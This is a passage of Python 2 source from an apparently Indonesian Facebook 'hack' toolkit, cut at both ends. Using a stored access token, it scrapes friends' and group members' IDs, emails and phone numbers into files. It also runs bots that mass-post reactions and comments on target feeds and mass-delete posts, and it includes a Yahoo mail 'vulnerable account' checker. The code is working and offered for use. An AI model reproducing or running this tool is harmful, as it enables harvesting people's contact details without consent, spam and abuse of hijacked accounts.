print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
